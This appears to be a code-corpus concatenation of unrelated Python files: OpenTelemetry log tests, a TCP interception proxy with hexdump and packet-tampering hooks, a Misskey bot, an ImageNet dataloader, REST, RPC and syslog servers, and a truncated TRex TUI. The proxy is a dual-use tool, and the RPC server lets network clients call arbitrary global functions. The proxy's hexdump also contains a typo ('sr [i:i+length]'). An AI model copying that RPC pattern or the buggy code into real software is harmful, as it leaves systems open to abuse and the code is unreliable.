log_emitter_provider.add_log_processor(SimpleLogProcessor(exporter))
logger = logging.getLogger("custom_level")
logger.setLevel(logging.ERROR)
logger.addHandler(OTLPHandler(log_emitter=log_emitter))
logger.warning("Warning message")
logger.debug("Debug message")
logger.error("Error message")
logger.critical("Critical message")
finished_logs = exporter.get_finished_logs()
# Make sure only level >= logging.CRITICAL logs are recorded
self.assertEqual(len(finished_logs), 2)
critical_log_record = finished_logs[0].log_record
fatal_log_record = finished_logs[1].log_record
self.assertEqual(critical_log_record.body, "Error message")
self.assertEqual(critical_log_record.severity_text, "ERROR")
self.assertEqual(
critical_log_record.severity_number, SeverityNumber.ERROR
)
self.assertEqual(fatal_log_record.body, "Critical message")
self.assertEqual(fatal_log_record.severity_text, "CRITICAL")
self.assertEqual(
fatal_log_record.severity_number, SeverityNumber.FATAL
)
def test_simple_log_processor_trace_correlation(self):
exporter = InMemoryLogExporter()
log_emitter_provider = LogEmitterProvider()
log_emitter = log_emitter_provider.get_log_emitter("name", "version")
log_emitter_provider.add_log_processor(SimpleLogProcessor(exporter))
logger = logging.getLogger("trace_correlation")
logger.addHandler(OTLPHandler(log_emitter=log_emitter))
logger.warning("Warning message")
finished_logs = exporter.get_finished_logs()
self.assertEqual(len(finished_logs), 1)
log_record = finished_logs[0].log_record
self.assertEqual(log_record.body, "Warning message")
self.assertEqual(log_record.severity_text, "WARNING")
self.assertEqual(log_record.severity_number, SeverityNumber.WARN)
self.assertEqual(log_record.trace_id, INVALID_SPAN_CONTEXT.trace_id)
self.assertEqual(log_record.span_id, INVALID_SPAN_CONTEXT.span_id)
self.assertEqual(
log_record.trace_flags, INVALID_SPAN_CONTEXT.trace_flags
)
exporter.clear()
tracer = trace.TracerProvider().get_tracer(__name__)
with tracer.start_as_current_span("test") as span:
logger.critical("Critical message within span")
finished_logs = exporter.get_finished_logs()
log_record = finished_logs[0].log_record
self.assertEqual(log_record.body, "Critical message within span")
self.assertEqual(log_record.severity_text, "CRITICAL")
self.assertEqual(log_record.severity_number, SeverityNumber.FATAL)
span_context = span.get_span_context()
self.assertEqual(log_record.trace_id, span_context.trace_id)
self.assertEqual(log_record.span_id, span_context.span_id)
self.assertEqual(log_record.trace_flags, span_context.trace_flags)
def test_simple_log_processor_shutdown(self):
exporter = InMemoryLogExporter()
log_emitter_provider = LogEmitterProvider()
log_emitter = log_emitter_provider.get_log_emitter(__name__)
log_emitter_provider.add_log_processor(SimpleLogProcessor(exporter))
logger = logging.getLogger("shutdown")
logger.addHandler(OTLPHandler(log_emitter=log_emitter))
logger.warning("Something is wrong")
finished_logs = exporter.get_finished_logs()
self.assertEqual(len(finished_logs), 1)
warning_log_record = finished_logs[0].log_record
self.assertEqual(warning_log_record.body, "Something is wrong")
self.assertEqual(warning_log_record.severity_text, "WARNING")
self.assertEqual(
warning_log_record.severity_number, SeverityNumber.WARN
)
exporter.clear()
log_emitter_provider.shutdown()
logger.warning("Log after shutdown")
finished_logs = exporter.get_finished_logs()
self.assertEqual(len(finished_logs), 0)
class TestBatchLogProcessor(ConcurrencyTestBase):
def test_emit_call_log_record(self):
exporter = InMemoryLogExporter()
log_processor = Mock(wraps=BatchLogProcessor(exporter))
provider = LogEmitterProvider()
provider.add_log_processor(log_processor)
emitter = provider.get_log_emitter(__name__)
logger = logging.getLogger("emit_call")
logger.addHandler(OTLPHandler(log_emitter=emitter))
logger.error("error")
self.assertEqual(log_processor.emit.call_count, 1)
def test_shutdown(self):
exporter = InMemoryLogExporter()
log_processor = BatchLogProcessor(exporter)
provider = LogEmitterProvider()
provider.add_log_processor(log_processor)
emitter = provider.get_log_emitter(__name__)
logger = logging.getLogger("shutdown")
logger.addHandler(OTLPHandler(log_emitter=emitter))
logger.warning("warning message: %s", "possible upcoming heatwave")
logger.error("Very high rise in temperatures across the globe")
logger.critical("Temparature hits high 420 C in Hyderabad")
log_processor.shutdown()
self.assertTrue(exporter._stopped)
finished_logs = exporter.get_finished_logs()
expected = [
("warning message: possible upcoming heatwave", "WARNING"),
("Very high rise in temperatures across the globe", "ERROR"),
(
"Temparature hits high 420 C in Hyderabad",
"CRITICAL",
),
]
emitted = [
(item.log_record.body, item.log_record.severity_text)
for item in finished_logs
]
self.assertEqual(expected, emitted)
def test_force_flush(self):
exporter = InMemoryLogExporter()
log_processor = BatchLogProcessor(exporter)
provider = LogEmitterProvider()
provider.add_log_processor(log_processor)
emitter = provider.get_log_emitter(__name__)
logger = logging.getLogger("force_flush")
logger.addHandler(OTLPHandler(log_emitter=emitter))
logger.critical("Earth is burning")
log_processor.force_flush()
finished_logs = exporter.get_finished_logs()
self.assertEqual(len(finished_logs), 1)
log_record = finished_logs[0].log_record
self.assertEqual(log_record.body, "Earth is burning")
self.assertEqual(log_record.severity_number, SeverityNumber.FATAL)
def test_log_processor_too_many_logs(self):
exporter = InMemoryLogExporter()
log_processor = BatchLogProcessor(exporter)
provider = LogEmitterProvider()
provider.add_log_processor(log_processor)
emitter = provider.get_log_emitter(__name__)
logger = logging.getLogger("many_logs")
logger.addHandler(OTLPHandler(log_emitter=emitter))
for log_no in range(1000):
logger.critical("Log no: %s", log_no)
self.assertTrue(log_processor.force_flush())
finised_logs = exporter.get_finished_logs()
self.assertEqual(len(finised_logs), 1000)
def test_with_multiple_threads(self):
exporter = InMemoryLogExporter()
log_processor = BatchLogProcessor(exporter)
provider = LogEmitterProvider()
provider.add_log_processor(log_processor)
emitter = provider.get_log_emitter(__name__)
logger = logging.getLogger("threads")
logger.addHandler(OTLPHandler(log_emitter=emitter))
def bulk_log_and_flush(num_logs):
for _ in range(num_logs):
logger.critical("Critical message")
self.assertTrue(log_processor.force_flush())
with ThreadPoolExecutor(max_workers=69) as executor:
futures = []
for idx in range(69):
future = executor.submit(bulk_log_and_flush, idx + 1)
futures.append(future)
executor.shutdown()
finished_logs = exporter.get_finished_logs()
self.assertEqual(len(finished_logs), 2415)
@unittest.skipUnless(
hasattr(os, "fork") and sys.version_info >= (3, 7),
"needs *nix and minor version 7 or later",
)
def test_batch_log_processor_fork(self):
# pylint: disable=invalid-name
exporter = InMemoryLogExporter()
log_processor = BatchLogProcessor(
exporter,
max_export_batch_size=64,
schedule_delay_millis=10,
)
provider = LogEmitterProvider()
provider.add_log_processor(log_processor)
emitter = provider.get_log_emitter(__name__)
logger = logging.getLogger("test-fork")
logger.addHandler(OTLPHandler(log_emitter=emitter))
logger.critical("yolo")
time.sleep(0.5) # give some time for the exporter to upload
self.assertTrue(log_processor.force_flush())
self.assertEqual(len(exporter.get_finished_logs()), 1)
exporter.clear()
multiprocessing.set_start_method("fork")
def child(conn):
def _target():
logger.critical("Critical message child")
self.run_with_many_threads(_target, 100)
time.sleep(0.5)
logs = exporter.get_finished_logs()
conn.send(len(logs) == 100)
conn.close()
parent_conn, child_conn = multiprocessing.Pipe()
p = multiprocessing.Process(target=child, args=(child_conn,))
p.start()
self.assertTrue(parent_conn.recv())
p.join()
log_processor.shutdown()
class TestConsoleLogExporter(unittest.TestCase):
def test_export(self): # pylint: disable=no-self-use
"""Check that the console exporter prints log records."""
log_data = LogData(
log_record=LogRecord(
timestamp=int(time.time() * 1e9),
trace_id=2604504634922341076776623263868986797,
span_id=5213367945872657620,
trace_flags=TraceFlags(0x01),
severity_text="WARN",
severity_number=SeverityNumber.WARN,
name="name",
body="Zhengzhou, We have a heaviest rains in 1000 years",
resource=SDKResource({"key": "value"}),
attributes={"a": 1, "b": "c"},
),
instrumentation_info=InstrumentationInfo(
"first_name", "first_version"
),
)
exporter = ConsoleLogExporter()
# Mocking stdout interferes with debugging and test reporting, mock on
# the exporter instance instead.
with patch.object(exporter, "out") as mock_stdout:
exporter.export([log_data])
mock_stdout.write.assert_called_once_with(
log_data.log_record.to_json() + os.linesep
)
self.assertEqual(mock_stdout.write.call_count, 1)
self.assertEqual(mock_stdout.flush.call_count, 1)
def test_export_custom(self): # pylint: disable=no-self-use
"""Check that console exporter uses custom io, formatter."""
mock_record_str = Mock(str)
def formatter(record): # pylint: disable=unused-argument
return mock_record_str
mock_stdout = Mock()
exporter = ConsoleLogExporter(out=mock_stdout, formatter=formatter)
log_data = LogData(
log_record=LogRecord(),
instrumentation_info=InstrumentationInfo(
"first_name", "first_version"
),
)
exporter.export([log_data])
mock_stdout.write.assert_called_once_with(mock_record_str)
|
proxy.py | import sys
import socket
import threading
def server_loop(local_host,local_port,remote_host,remote_port,receive_first):
"""
Server loop function, will print out local conenction
info and uses a thread to talk to the remote host
"""
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
server.bind((local_host, local_port))
except:
print ("[!!] Failed to listen on %s:%d" % (local_host, local_port))
print ("[!!] Check for other lustening sockets or correct permissions")
sys.exit(0)
print ("[*] Listening on %s:%d" % (local_host,local_port))
server.listen(5)
while True:
client_socket, addr = server.accept()
print ("[==>] Received incoming connection from %s:%d" % (addr[0],addr[1]))
proxy_thread = threading.Thread(target=proxy_handler, args=(client_socket, remote_host, remote_port, receive_first))
proxy_thread.start()
def proxy_handler(client_socket, remote_host, remote_port, receive_first):
"""
Connect to the remote host and receive data
from the remote end if necessary.
If we recieve first, send it to the resposne handler
and if there is data send it to our local client
"""
remote_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
remote_socket.connect((remote_host,remote_port))
if receive_first:
remote_buffer = receive_from(remote_socket)
hexdump(remote_buffer)
remote_buffer = response_handler(remote_buffer)
if len(remote_buffer):
print("[<==] Sending %d bytres to lcoalhost." % len(remote_buffer))
client_socket.send(remote_buffer)
while True:
local_buffer = receive_from(client_socket)
if len(local_buffer):
print("[<==] Sending %d bytes to localhost." % len(remote_buffer))
hexdump(local_buffer)
local_buffer = request_handler(local_buffer)
remote_socket.send(local_buffer)
print ("[==>] Sent to remote")
remote_buffer = receive_from(remote_socket)
if len(remote_buffer):
print("[<==] Received %d bytes from remote." % len(remote_buffer))
hexdump(remote_buffer)
remote_buffer = response_handler(remote_buffer)
client_socket.send(remote_buffer)
print ("[<==] Sent to localhost")
if not len(local_buffer) or not len(remote_buffer):
client_socket.close()
remote_socket.close()
print ("[*] No more data. Closing connections.")
break
def hexdump(src, length=16):
"""
This is a pretty hex dumping function directly
taken from the comments here:
http://code.activestate.com/recipes/142812-hex-dumper/
"""
result = []
digits = 4 if isinstance(src, unicode) else 2
for i in xrange(0, len(src), length):
s = sr [i:i+length]
hexa = b' '.join(["%0*X" % (digits, ord(x)) for x in s])
text = b''.join([x if 0x20 <= ord(x) < 0x7F else b'.' for x in s])
result.append( b"%04X %-*s %s" % (i, length*(digits + 1), hexa, text))
print (b'\n'.join(result))
def receive_from(connection):
"""
Read data into buffer until
there is no more
"""
buffer = ""
connection.settimeout(2)
try:
while True:
data = connection.recv(4096)
if not data:
break
buffer += data
except:
pass
return buffer
def request_handler(buffer):
"""
Perform packet modifications.
Add modifications here to extend
"""
return buffer
def response_handler(buffer):
"""
Perform any response
packet modifications here
to extend functionality
"""
return buffer
def main():
# no fancy command line passing here
if len(sys.argv[1:]) != 5:
print ("Usage: ./proxy.py [localhost] [localport] [remotehost] [remoteport] [receive_first]")
print ("Example ./proxy.py 127.0.0.1 9000 10.12.132.1 9000 True")
sys.exit(0)
# Setup local listening params
local_host = sys.argv[1]
local_port = int(sys.argv[2])
# setup remote target
remote_host = sys.argv[3]
remote_port = int(sys.argv[4])
# this tells our proxy to connect and receive data
# before sending to the remote host
receive_first = sys.argv[5]
if "True" in receive_first:
receive_first = True
else:
receive_first = False
#now spin up a listening socket
server_loop(local_host, local_port, remote_host, remote_port, receive_first)
main()
|
rdbot.py | import asyncio
import threading
from mi.ext import commands, tasks
from mi.framework import Note
from mi.framework.router import Router
from roboduck import *
# Load Misskey configuration
config = configparser.ConfigParser()
config.read(Path(__file__).parent.joinpath('bot.cfg'))
uri = "https://" + config.get("misskey", "instance_write")
token = config.get("misskey", "token")
contentwarning = config.get("misskey", "cw")
if contentwarning.lower() == "none":
contentwarning = None
class MyBot(commands.Bot):
text_model = None # Holds the markov object, so it won't be recreated everytime
def __init__(self):
super().__init__()
@tasks.loop(3600)
async def loop_1h(self):
text = create_sentence()
await bot.client.note.send(content=text, visibility="home", cw=contentwarning)
@tasks.loop(43200)
async def loop_12h(self):
thread_update = threading.Thread(target=update)
thread_update.daemon = True
thread_update.start()
async def on_ready(self, ws):
await Router(ws).connect_channel(["global", "main"]) # Connect to global and main channels
await bot.client.note.send(content=datetime.now().strftime('%Y-%m-%d %H:%M:%S') + " :roboduck: Bot started!",
visibility="specified")
self.loop_12h.start() # Launching renew posts every 12 hours
self.loop_1h.start() #
print(datetime.now().strftime('%Y-%m-%d %H:%M:%S') + " Roboduck Bot started!")
async def on_mention(self, note: Note):
if not note.author.is_bot:
text = note.author.action.get_mention() + " "
text += create_sentence()
await note.reply(content=text, cw=contentwarning) # Reply to a note
async def on_reconnect(self, ws):
await Router(ws).connect_channel(["global", "main"]) # Connect to global and main channels
if __name__ == "__main__":
databasepath = Path(__file__).parent.joinpath('roboduck.db')
if not (os.path.exists(databasepath) and os.stat(databasepath).st_size != 0):
init_bot()
bot = MyBot()
asyncio.run(bot.start(uri, token, timeout=600))
|
dataloader.py | import ujson
import gzip
import numpy as np
import random
import threading
import time
from path_to_data import image_path_to_image_and_distribution_tensor
class DataLoader(object):
SATURATION_THRESHOLD = 0.1
OUTPUT_IMAGE_SIZE = 64
INPUT_IMAGE_SIZE = 256
TRAIN_SOURCE = '../dataset_indexes/imagenet_train_256_saturation_values.json.gz'
VALIDATION_SOURCE = '../dataset_indexes/imagenet_human_validation_set.json'
CATEGORY_SOURCE = '../dataset_indexes/imagenet_train_256_category_paths_reweighted.json.gz'
# This is the per-example probability that an example will be pulled from a specific category.
# This encourages that images from the same category show up together more often.
CATEGORY_REWEIGHT_ALPHA = 0.1
def __init__(self, batch_size, use_imagenet=True, batching_style="reweighted"):
self.batch_size = batch_size
self.batching_style = batching_style
self._load_paths_and_threshold(use_imagenet)
self.training_batches = []
self.batches_available = threading.Semaphore(0)
self.DESIRED_QUEUED_BATCHES = 3
if use_imagenet:
self.root = '../../datasets/imagenet/train256/'
self.validation_root = '../../datasets/imagenet/val256/'
else:
print "Don't know where the places_2 root is!"
raise
def get_filenames_for_batch(self):
'''
Returns a list of filenames. Uses value from self.batching_style.
'''
paths = []
if self.batching_style == "reweighted":
# Pick a category to focus on.
focus_category = self.categories[int(random.random()*len(self.categories))]
category_filenames = self.category_index[focus_category]
for i in xrange(self.batch_size):
if random.random() <= self.CATEGORY_REWEIGHT_ALPHA:
paths.append(category_filenames[int(random.random()*len(category_filenames))])
else:
paths.append(self.all_paths[int(random.random() * len(self.all_paths))])
else:
paths = [self.all_paths[int(random.random() * len(self.all_paths))] for i in xrange(self.batch_size)]
return paths
def next_batch(self):
"""Gets the next batch from the dataset and starts loading others in parallel."""
# Make sure that we always have enough batches precomputed
for b in xrange(self.DESIRED_QUEUED_BATCHES - len(self.training_batches)):
threading.Thread(target = self._load_batch).start()
self.batches_available.acquire() # Wait for a new batch
data_x, data_y_, data_y_rebalance = self.training_batches[0]
del self.training_batches[0]
return data_x, data_y_, data_y_rebalance
def get_validation_batch(self):
x_batch = np.zeros((len(self.validation_paths), self.INPUT_IMAGE_SIZE, self.INPUT_IMAGE_SIZE, 1))
y__batch = np.zeros((len(self.validation_paths), self.OUTPUT_IMAGE_SIZE, self.OUTPUT_IMAGE_SIZE, 313))
gt_batch = np.zeros((len(self.validation_paths), self.INPUT_IMAGE_SIZE, self.INPUT_IMAGE_SIZE, 3))
for i in range(len(self.validation_paths)):
path = self.validation_paths[i]
x, y_, _, ground_truth= image_path_to_image_and_distribution_tensor(self.validation_root + path)
x_batch[i, ...] = x.reshape((256, 256, 1))
y__batch[i, ...] = y_
gt_batch[i, ...] = ground_truth
return x_batch, y__batch, gt_batch
def _load_batch(self):
"""Load the next batch, queue it, and increase the semaphore."""
lt = time.time()
x_batch = np.zeros((self.batch_size, self.INPUT_IMAGE_SIZE, self.INPUT_IMAGE_SIZE, 1))
y__batch = np.zeros((self.batch_size, self.OUTPUT_IMAGE_SIZE, self.OUTPUT_IMAGE_SIZE, 313))
y_reweight_batch = np.zeros((self.batch_size, self.OUTPUT_IMAGE_SIZE, self.OUTPUT_IMAGE_SIZE))
paths = self.get_filenames_for_batch()
for i,path in enumerate(paths):
x, y_, y_reweight, _ = image_path_to_image_and_distribution_tensor(self.root + path)
x_batch[i, ...] = x.reshape((256, 256, 1))
y__batch[i, ...] = y_
y_reweight_batch[i, ...] = y_reweight
self.training_batches.append((x_batch, y__batch, y_reweight_batch))
self.batches_available.release()
print "Batch loaded in parallel ", (time.time() - lt)
def _load_paths_and_threshold(self, use_imagenet):
'''Loads all the paths and removes those below the saturation threshold.'''
if self.batching_style == "reweighted":
# Take the file list from the reweighted category list
f = ujson.load(gzip.open(self.CATEGORY_SOURCE, 'rt'))
self.all_paths = []
for category, paths in f.items():
self.all_paths += [path for path in paths if path > self.SATURATION_THRESHOLD]
else:
f = ujson.load(gzip.open(self.TRAIN_SOURCE, 'rt'))
self.all_paths = [path for path in f.keys() if f[path] > self.SATURATION_THRESHOLD]
vf = ujson.load(open(self.VALIDATION_SOURCE, 'rt'))
self.validation_paths = [path for path in vf.keys() if vf[path] > self.SATURATION_THRESHOLD]
self.category_index = ujson.load(gzip.open(self.CATEGORY_SOURCE, 'rt'))
self.categories = self.category_index.keys()
|
rest_api_endpoint.py | """
Copyright (c) 2015 SONATA-NFV and Paderborn University
ALL RIGHTS RESERVED.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Neither the name of the SONATA-NFV [, ANY ADDITIONAL AFFILIATION]
nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written
permission.
This work has been performed in the framework of the SONATA project,
funded by the European Commission under Grant number 671517 through
the Horizon 2020 and 5G-PPP programmes. The authors would like to
acknowledge the contributions of their colleagues of the SONATA
partner consortium (www.sonata-nfv.eu).
"""
import logging
import threading
from flask import Flask
from flask_restful import Api
from gevent.wsgi import WSGIServer
# need to import total module to set its global variable dcs
import compute
from compute import dcs, ComputeList, Compute, ComputeResources, DatacenterList, DatacenterStatus
# need to import total module to set its global variable net
import network
from network import NetworkAction, DrawD3jsgraph
import monitor
from monitor import MonitorInterfaceAction, MonitorFlowAction, MonitorLinkAction, MonitorSkewAction, MonitorTerminal
import pkg_resources
from os import path
logging.basicConfig(level=logging.INFO)
class RestApiEndpoint(object):
"""
Simple API endpoint that offers a REST
interface. This interface will be used by the
default command line client.
"""
def __init__(self, listenip, port, DCnetwork=None):
self.ip = listenip
self.port = port
# connect this DC network to the rest api endpoint (needed for the networking and monitoring api)
self.connectDCNetwork(DCnetwork)
# setup Flask
# find directory of dashboard files
dashboard_file = pkg_resources.resource_filename('emuvim.dashboard', "index.html")
dashboard_dir = path.dirname(dashboard_file)
logging.info("Started emu dashboard: {0}".format(dashboard_dir))
self.app = Flask(__name__, static_folder=dashboard_dir, static_url_path='/dashboard')
self.api = Api(self.app)
# setup endpoints
# compute related actions (start/stop VNFs, get info)
self.api.add_resource(Compute, "/restapi/compute/<dc_label>/<compute_name>")
self.api.add_resource(ComputeList,
"/restapi/compute",
"/restapi/compute/<dc_label>")
self.api.add_resource(ComputeResources, "/restapi/compute/resources/<dc_label>/<compute_name>")
self.api.add_resource(DatacenterStatus, "/restapi/fog/<dc_label>")
self.api.add_resource(DatacenterList, "/restapi/fog")
# network related actions (setup chaining between VNFs)
self.api.add_resource(NetworkAction,
"/restapi/network")
self.api.add_resource(DrawD3jsgraph,
"/restapi/network/d3jsgraph")
# monitoring related actions
# export a network interface traffic rate counter
self.api.add_resource(MonitorInterfaceAction,
"/restapi/monitor/interface")
# export flow traffic counter, of a manually pre-installed flow entry, specified by its cookie
self.api.add_resource(MonitorFlowAction,
"/restapi/monitor/flow")
# install monitoring of a specific flow on a pre-existing link in the service.
# the traffic counters of the newly installed monitor flow are exported
self.api.add_resource(MonitorLinkAction,
"/restapi/monitor/link")
# install skewness monitor of resource usage disribution
# the skewness metric is exported
self.api.add_resource(MonitorSkewAction,
"/restapi/monitor/skewness")
# start a terminal window for the specified vnfs
self.api.add_resource(MonitorTerminal,
"/restapi/monitor/term")
logging.debug("Created API endpoint %s(%s:%d)" % (self.__class__.__name__, self.ip, self.port))
def connectFog(self, dc):
compute.dcs[dc.label] = dc
logging.info(
"Connected DC(%s) to API endpoint %s(%s:%d)" % (dc.label, self.__class__.__name__, self.ip, self.port))
def connectDCNetwork(self, DCnetwork):
network.net = DCnetwork
monitor.net = DCnetwork
logging.info("Connected DCNetwork to API endpoint %s(%s:%d)" % (
self.__class__.__name__, self.ip, self.port))
def start(self):
thread = threading.Thread(target=self._start_flask, args=())
thread.daemon = True
thread.start()
logging.info("Started API endpoint @ http://%s:%d" % (self.ip, self.port))
def _start_flask(self):
#self.app.run(self.ip, self.port, debug=False, use_reloader=False)
#this should be a more production-fit http-server
#self.app.logger.setLevel(logging.ERROR)
http_server = WSGIServer((self.ip, self.port),
self.app,
log=open("/dev/null", "w") # This disables HTTP request logs to not mess up the CLI when e.g. the auto-updated dashboard is used
)
http_server.serve_forever()
|
nanomsg.py | import pynng
from .common import *
class NanomsgRPCServer:
@staticmethod
def ping():
return 'pong'
@staticmethod
def new_req(name: str, *args, **kwargs):
return json.dumps(dict(name=name, args=args, kwargs=kwargs)).encode()
def __init__(self, url):
self.url = url
self.__reset__()
def __reset__(self):
self._running = False
self._rep_socket = pynng.Rep0()
def __start__(self):
if not self._running:
t = threading.Thread(target=self.__run__, daemon=True)
t.start()
else:
raise RPCError('thread still running, or stopped incorrectly')
def __stop__(self):
self.__send_result__(True)
self._rep_socket.close()
self.__reset__()
def __run__(self):
self._rep_socket.listen(self.url)
self._running = True
print('running')
while self._running:
try:
q = self.__receive_request__()
name = q['name']
target = self.__find_call_target__(name)
args = q['args']
kwargs = q['kwargs']
r = target(*args, **kwargs)
try:
self.__send_result__(r)
except pynng.BadState:
if name != 'stop':
raise
except Exception as e:
self.__send_error__(e)
@lru_cache()
def __find_call_target__(self, name):
try:
return getattr(self, name)
except AttributeError:
try:
return globals()[name]
except KeyError:
raise NameError(name)
def __send_dict__(self, d):
try:
s = json.dumps(d, ensure_ascii=False).encode()
except Exception as e:
self.__send_error__(e)
else:
self._rep_socket.send(s)
def __receive_request__(self):
return json.loads(self._rep_socket.recv())
def __send_error__(self, e: Exception):
d = dict(ok=False, error=f'Python Exception: {type(e).__name__}: {e}')
self.__send_dict__(d)
def __send_result__(self, json_obj):
d = dict(ok=True, result=json_obj)
self.__send_dict__(d)
|
syslog.py | # -*- coding: utf-8 -*-
"""Syslog utility for tests."""
import logging
import threading
from six.moves import socketserver
logger = logging.getLogger(__name__)
class SyslogUDPHandler(socketserver.BaseRequestHandler):
"""Syslog UDP dummy handler."""
outputHandle = None
def handle(self):
"""Handle incoming data by logging to debug and writing to logfie."""
data = bytes.decode(self.request[0].strip())
logger.debug(data)
self.outputHandle.write(data)
self.outputHandle.flush()
def runSyslogServer(host, port, logfile):
"""Run a dummy syslog server.
:param host: IP address to listen
:param port: Port to listen
:param logfile: File handle used to write incoming logs
"""
logfilehandle = open(logfile, "w+")
handler = SyslogUDPHandler
handler.outputHandle = logfilehandle
syslogd = socketserver.UDPServer((host, port), handler)
def serve():
syslogd.serve_forever()
thread = threading.Thread(target=serve)
thread.start()
return syslogd
|
trex_tui.py | from __future__ import print_function
import termios
import sys
import os
import time
import threading
from collections import OrderedDict, deque
from texttable import ansi_len
import datetime
import readline
if sys.version_info > (3,0):
from io import StringIO
else:
from cStringIO import StringIO
from ..utils.text_opts import *
from ..utils.common import list_intersect
from ..utils import text_tables
from ..utils.filters import ToggleFilter
from ..common.trex_exceptions import TRexError
from ..astf.trex_astf_exceptions import ASTFErrorBadTG
class TUIQuit(Exception):
pass
def ascii_split (s):
output = []
lines = s.split('\n')
for elem in lines:
if ansi_len(elem) > 0:
output.append(elem)
return output
class SimpleBar(object):
def __init__ (self, desc, pattern):
self.desc = desc
self.pattern = pattern
self.pattern_len = len(pattern)
self.index = 0
def show (self, buffer):
if self.desc:
print(format_text("{0} {1}".format(self.desc, self.pattern[self.index]), 'bold'), file = buffer)
else:
print(format_text("{0}".format(self.pattern[self.index]), 'bold'), file = buffer)
self.index = (self.index + 1) % self.pattern_len
# base type of a panel
class TrexTUIPanel(object):
def __init__ (self, mng, name):
self.mng = mng
self.name = name
self.client = mng.client
self.is_graph = False
def show (self, buffer):
raise NotImplementedError("must implement this")
def get_key_actions (self):
raise NotImplementedError("must implement this")
def get_name (self):
return self.name
# dashboard panel
class TrexTUIDashBoard(TrexTUIPanel):
FILTER_ACQUIRED = 1
FILTER_ALL = 2
def __init__ (self, mng):
super(TrexTUIDashBoard, self).__init__(mng, "dashboard")
self.ports = self.client.get_all_ports()
self.key_actions = OrderedDict()
self.key_actions['c'] = {'action': self.action_clear, 'legend': 'clear', 'show': True}
self.key_actions['p'] = {'action': self.action_pause, 'legend': 'pause', 'show': True, 'color': 'red'}
self.key_actions['r'] = {'action': self.action_resume, 'legend': 'resume', 'show': True, 'color': 'blue'}
self.key_actions['o'] = {'action': self.action_show_owned, 'legend': 'owned ports', 'show': True}
self.key_actions['n'] = {'action': self.action_reset_view, 'legend': 'reset view', 'show': True}
self.key_actions['a'] = {'action': self.action_show_all, 'legend': 'all ports', 'show': True}
# register all the ports to the toggle action
for port_id in self.ports:
self.key_actions[str(port_id)] = {'action': self.action_toggle_port(port_id), 'legend': 'port {0}'.format(port_id), 'show': False}
self.toggle_filter = ToggleFilter(self.ports)
if self.client.get_acquired_ports():
self.action_show_owned()
else:
self.action_show_all()
def get_showed_ports (self):
return self.toggle_filter.filter_items()
def show (self, buffer):
self.client._show_global_stats(buffer = buffer)
if self.get_showed_ports():
self.client._show_port_stats(ports = self.get_showed_ports(), buffer = buffer)
def get_key_actions (self):
allowed = OrderedDict()
allowed['n'] = self.key_actions['n']
allowed['o'] = self.key_actions['o']
allowed['a'] = self.key_actions['a']
for i in self.ports:
allowed[str(i)] = self.key_actions[str(i)]
if self.get_showed_ports():
allowed['c'] = self.key_actions['c']
# if not all ports are acquired - no operations
if not (set(self.get_showed_ports()) <= set(self.client.get_acquired_ports())):
return allowed
if self.client.get_mode() == 'STL':
# if any/some ports can be resumed
if set(self.get_showed_ports()) & set(self.client.get_paused_ports()):
allowed['r'] = self.key_actions['r']
# if any/some ports are transmitting - support those actions
if set(self.get_showed_ports()) & set(self.client.get_transmitting_ports()):
allowed['p'] = self.key_actions['p']
return allowed
######### actions
def action_pause (self):
ports = list_intersect(self.get_showed_ports(), self.client.get_transmitting_ports())
try:
rc = self.client.pause(ports = ports)
except TRexError:
pass
return ""
def action_resume (self):
ports = list_intersect(self.get_showed_ports(), self.client.get_paused_ports())
try:
self.client.resume(ports = ports)
except TRexError:
pass
return ""
def action_reset_view (self):
self.toggle_filter.reset()
return ""
def action_show_owned (self):
self.toggle_filter.reset()
self.toggle_filter.toggle_items(*self.client.get_acquired_ports())
return ""
def action_show_all (self):
self.toggle_filter.reset()
self.toggle_filter.toggle_items(*self.client.get_all_ports())
return ""
def action_clear (self):
self.client.clear_stats(self.toggle_filter.filter_items())
return "cleared all stats"
def action_toggle_port(self, port_id):
def action_toggle_port_x():
self.toggle_filter.toggle_item(port_id)
return ""
return action_toggle_port_x
# streams stats
class TrexTUIStreamsStats(TrexTUIPanel):
def __init__ (self, mng):
super(TrexTUIStreamsStats, self).__init__(mng, "sstats")
self.key_actions = OrderedDict()
self.key_actions['c'] = {'action': self.action_clear, 'legend': 'clear', 'show': True}
def show (self, buffer):
self.client._show_global_stats(buffer = buffer)
self.client._show_streams_stats(buffer = buffer)
def get_key_actions (self):
return self.key_actions
def action_clear (self):
self.client.pgid_stats.clear_stats()
return ""
# latency stats
class TrexTUILatencyStats(TrexTUIPanel):
def __init__ (self, mng):
super(TrexTUILatencyStats, self).__init__(mng, "lstats")
self.key_actions = OrderedDict()
self.key_actions['c'] = {'action': self.action_clear, 'legend': 'clear', 'show': True}
self.key_actions['h'] = {'action': self.action_toggle_histogram, 'legend': 'histogram toggle', 'show': True}
self.is_histogram = False
def show (self, buffer):
self.client._show_global_stats(buffer = buffer)
if self.is_histogram:
self.client._show_latency_histogram(buffer = buffer)
else:
self.client._show_latency_stats(buffer = buffer)
def get_key_actions (self):
return self.key_actions
def action_toggle_histogram (self):
self.is_histogram = not self.is_histogram
return ""
def action_clear (self):
self.client.pgid_stats.clear_stats()
return ""
class TrexTUIAstfTrafficStats(TrexTUIPanel):
def __init__(self, mng):
super(TrexTUIAstfTrafficStats, self).__init__(mng, "astats")
self.start_row = 0
self.max_lines = TrexTUI.MIN_ROWS - 16 # 16 is size of panels below and above
self.num_lines = 0
self.tgid = 0
self.is_sum = True if self.client.is_dynamic else False
self.is_dynamic = False
self.key_actions = OrderedDict()
self.key_actions['c'] = {'action': self.action_clear, 'legend': 'clear', 'show': Predicate(lambda : self.tgid == 0)}
self.key_actions['Up'] = {'action': self.action_up, 'legend': 'scroll up', 'show': True}
self.key_actions['Down'] = {'action': self.action_down, 'legend': 'scroll down', 'show': True}
self.key_actions['Left'] = {'action': self.action_left, 'legend': 'previous TG', 'show': True}
self.key_actions['Right'] = {'action': self.action_right, 'legend': 'next TG', 'show': True}
self.key_actions['m'] = {'action': self.action_dynamic_counters, 'legend': 'dynamic counters on/off', 'show': True}
def show(self, buffer):
